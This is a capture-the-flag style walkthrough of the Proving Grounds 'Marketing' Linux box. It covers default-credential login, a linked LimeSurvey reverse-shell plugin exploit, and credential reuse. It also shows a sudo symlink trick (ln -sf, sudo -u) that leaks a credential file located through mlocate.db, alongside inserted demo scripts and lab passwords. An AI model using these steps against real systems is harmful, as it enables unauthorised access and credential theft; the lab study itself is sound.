[OSCP Practice Series 32] Proving Grounds — Marketing

Ardian Danny
5 min read · Jan 10, 2024


Machine Type: Linux

Initial

Nmap discovered that port 22 and port 80 are open. I added the ‘marketing.pg’ domain to the /etc/hosts file, and now, let’s proceed.

Port 80 seems like a static landing page.

Directory listing is enabled.

I decided to run Dirbuster for a while. Dirbuster discovered common files and directories like assets, vendor, etc. But there’s this one directory I’ve never seen before, which is ‘/old.’

Visiting it shows the same page as before.

After a closer look, it turns out the clue for us is in the page source.

We got a subdomain. I had tried to brute-force subdomains earlier and found nothing; this one has an uncommon name that is simply not in common wordlists, which is why brute-forcing missed it.

Let’s add it to our hosts file and continue.

Foothold

A LimeSurvey site. We have a potential user with the email admin@marketing.pg. There’s no navigation, but there is a /admin directory.

We know there’s potentially a user called ‘admin.’ Let’s try to guess the credentials. Okay, admin:password works!

We got the LimeSurvey version as well now.

Oh nice, there’s an exploit available https://github.com/Y1LD1R1M-1337/Limesurvey-RCE.

I followed the steps on the GitHub page: edited php-rev.php (the reverse-shell payload), uploaded and installed it as a plugin, activated it, and opened it. Sure enough, I got a shell.

There are two users, m.sander and t.miller.

Getting User

MySQL is running locally, which usually means there is a config file containing database credentials that the web user can read.

I googled the LimeSurvey config file location.

Indeed, it is under /application/config/config.php, relative to the LimeSurvey web root.

We got the database credentials.

'username' => 'limesurvey_user',
'password' => 'EzPwz2022_dev1$$23!!',

The database itself held nothing new. Perhaps the database password is reused, though, and we can use it to escalate our privileges.

Indeed it is reused: switching to t.miller with the database password works.

Getting Second User

Via sudo, we can run /usr/bin/sync.sh as m.sander.

The script only updates /home/m.sander/personal/notes.txt from the file we pass in when the two differ, but it also displays the difference. What if we create a file, point it at (symlink it to) a file that only m.sander can read, and then run sync.sh on it? The script runs as m.sander, so it can read the target, and the diff will show us the content.
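The post never shows the source of /usr/bin/sync.sh, so the following is an added example, not the box's script: a hypothetical reconstruction (sync_like) of the behaviour described above, a hardened variant, and a demo that runs entirely in a temporary directory as a single user. The file names creds.txt, notes.txt and link are constructed stand-ins for creds-for-2022.txt, notes.txt and the attacker's symlink; the sudo privilege boundary itself is not reproduced, only the mechanism that leaks through it.

```shell
#!/bin/sh
# Added example, not the box's real /usr/bin/sync.sh (its source is not shown in the post).
# sync_like is a hypothetical reconstruction of the described behaviour: show the diff
# between the caller-supplied file and the notes file, then update the notes file when
# they differ. diff(1) follows symlinks, so when this runs as m.sander (via sudo), a
# symlink supplied by the caller makes the privileged diff read, and print, any file
# m.sander can read.
sync_like() {
    src="$1"
    notes="$2"
    # diff exits 1 when the files differ; testing it in an if keeps that from tripping set -e
    if ! diff "$notes" "$src"; then
        cp "$src" "$notes"
    fi
}

# Hardened variant: refuse anything that is not a plain regular file
# (symlinks, devices, FIFOs) before diff ever opens it.
sync_hardened() {
    src="$1"
    notes="$2"
    if [ -L "$src" ] || [ ! -f "$src" ]; then
        echo "refusing $src: symlink or not a regular file" >&2
        return 1
    fi
    if ! diff "$notes" "$src"; then
        cp "$src" "$notes"
    fi
}

# Demo of the leak, in a temp dir and as one user. The constructed creds.txt stands in
# for /home/m.sander/personal/creds-for-2022.txt, notes.txt for notes.txt, and link for
# the attacker's symlink. Prints the lines the vulnerable script reveals from the target.
demo_leak() {
    tmp=$(mktemp -d)
    printf 'm.sander: constructed-secret\n' > "$tmp/creds.txt"
    printf 'old note\n' > "$tmp/notes.txt"
    ln -sf "$tmp/creds.txt" "$tmp/link"
    sync_like "$tmp/link" "$tmp/notes.txt" | grep '^>'
    rm -rf "$tmp"
}

# Same setup against the hardened script: reports "refused" and notes.txt is left intact.
demo_hardened() {
    tmp=$(mktemp -d)
    printf 'm.sander: constructed-secret\n' > "$tmp/creds.txt"
    printf 'old note\n' > "$tmp/notes.txt"
    ln -sf "$tmp/creds.txt" "$tmp/link"
    if sync_hardened "$tmp/link" "$tmp/notes.txt" 2>/dev/null; then
        echo allowed
    else
        echo "refused, notes=$(cat "$tmp/notes.txt")"
    fi
    rm -rf "$tmp"
}

demo_leak
demo_hardened
```

The `[ -L ]` / `[ -f ]` check closes the symlink trick shown here, but it is still a check-then-use on a caller-controlled path, so an attacker who can swap the path between the test and the diff can race it. The robust fix for a sudo-run script is to not echo diffs of arbitrary caller paths at all, or to restrict the argument to a fixed, trusted directory.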

The problem is that we don't know which file, readable only by m.sander, is worth reading.

After looking around for a while, the clue turned out to be our group membership: t.miller belongs to the mlocate group.

find / -group mlocate 2>/dev/null | grep -v '^/proc\|^/run\|^/sys\|^/snap'

That turns up mlocate.db, the locate index. It records file paths from the whole filesystem, including directories the current user cannot list, which is exactly what the mlocate group membership buys us. There's a lot in it and at first I couldn't find anything useful. After digging for more clues, it turns out the database lists a file called creds-for-2022.txt inside /home/m.sander/personal.
Jeez, how were we even supposed to know that.
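A plain grep or strings over mlocate.db only shows basenames, because the database stores each directory path once and then its entry names, so joining them back together is what makes a hit like creds-for-2022.txt immediately actionable. The following is an added example, not from the post and not the box's real database: it lists every dir/name recorded in an mlocate database with only tr and awk, run against a small database constructed inline to follow the layout documented in mlocate.db(5). The paths /home/m.sander/personal and /home/t.miller/.ssh in the sample are constructed for the demo.

```shell
#!/bin/sh
# Added example: list the paths recorded in an mlocate database without locate(1).
# The sample database is constructed to follow the layout in mlocate.db(5):
# 8-byte magic "\0mlocate", 4-byte config block size, 1-byte version, 1-byte
# visibility flag, 2 bytes padding, NUL-terminated root path, config block; then
# per directory a 16-byte timestamp header, the NUL-terminated directory path,
# and entries of one type byte (0 file, 1 subdir, 2 end) plus a NUL-terminated name.

# mlocate_paths DB: print every recorded path as dir/name.
# Type bytes 0/1/2 and the NUL terminators all become newlines; lines with
# non-printable bytes (the binary timestamp header) are dropped; a line starting
# with "/" becomes the current directory; every other line is a name inside it.
mlocate_paths() {
    LC_ALL=C tr '\000\001\002' '\n\n\n' < "$1" |
    LC_ALL=C awk '
        /[^[:print:]]/ || $0 == "" { next }
        /^\// { dir = $0; next }
        dir != "" { sep = (dir == "/") ? "" : "/"; print dir sep $0 }'
}

# write_sample_db FILE: constructed database with two directories (not the box's db).
write_sample_db() {
    {
        printf '\000mlocate'                        # magic
        printf '\000\000\000\000\000\000\000\000'   # config size 0, version 0, flag 0, pad
        printf '/\000'                              # root path; empty config block follows
        printf '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000'  # dir time
        printf '/home/m.sander/personal\000'
        printf '\000creds-for-2022.txt\000'         # type 0 = regular file
        printf '\000notes.txt\000'
        printf '\002'                               # type 2 = end of this directory
        printf '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000'  # dir time
        printf '/home/t.miller\000'
        printf '\001.ssh\000'                       # type 1 = subdirectory
        printf '\002'
    } > "$1"
}

# sample_paths: build the sample database and list everything it records.
sample_paths() {
    tmp=$(mktemp -d)
    write_sample_db "$tmp/mlocate.db"
    mlocate_paths "$tmp/mlocate.db"
    rm -rf "$tmp"
}

# demo: the search that matters on this box, credentials by name.
demo() {
    sample_paths | grep -i cred
}

sample_paths
demo
```

On a real database, point mlocate_paths at the actual db file (on Debian-family systems it normally lives under /var/lib/mlocate/) and pipe the output into grep for cred, pass, key, backup and the like. Two caveats: a real database carries a non-empty config block, whose variable names will show up as false entries under "/", and timestamp bytes that happen to be printable can produce the odd junk name; neither stops the grep from working.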

Okay, so I created a symlink to that file and ran the sync.sh again in the hope of getting the difference.

ln -sf /home/m.sander/personal/creds-for-2022.txt fk_this_box
sudo -u m.sander /usr/bin/sync.sh fk_this_box

We got the diff, and with it a set of credentials.

m.sander: pa$$word@123$$4!!
m.sander: EzPwz2022_dev1$$23!!
m.sander: EzPwz2022_12345678#!

Use the credentials to SSH in as m.sander. The third one worked (the second is just the database password we already had).

Getting Root

local.txt: eca1ceedd69ffd9e28f1c27e2142321b
proof.txt: bdbf2746346fe7f3bee907e0c1cee966

Learned

  • Enumerate EVERYTHING: look through everything and every little possibility, even web source code.
  • Look through unusual groups.


Ardian Danny

Penetration Tester, Ethical Hacker, CTF Player, and a Cat Lover. My first account got disabled by Medium, but it won’t stop me from sharing the things I love.